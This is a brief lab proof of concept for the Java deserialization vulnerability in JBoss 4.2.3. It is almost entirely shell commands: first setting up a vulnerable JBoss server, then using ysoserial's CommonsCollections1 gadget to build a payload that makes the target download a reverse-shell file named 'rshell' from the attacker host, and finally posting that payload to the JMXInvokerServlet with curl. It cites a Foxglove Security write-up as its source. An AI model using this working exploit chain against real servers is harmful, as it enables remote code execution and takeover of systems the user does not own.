Server - 192.168.1.1
#wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download
#unzip jboss-4.2.3.zip
#mv jboss-4.2.3.GA /usr/local/share/jboss
#adduser appserver
#chown -R appserver /usr/local/share/jboss
#su -l appserver
$cd /usr/local/share/jboss/bin
$./run.sh -b 0.0.0.0
Client - 192.168.1.2
#wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar
#java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload
#curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet
References
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/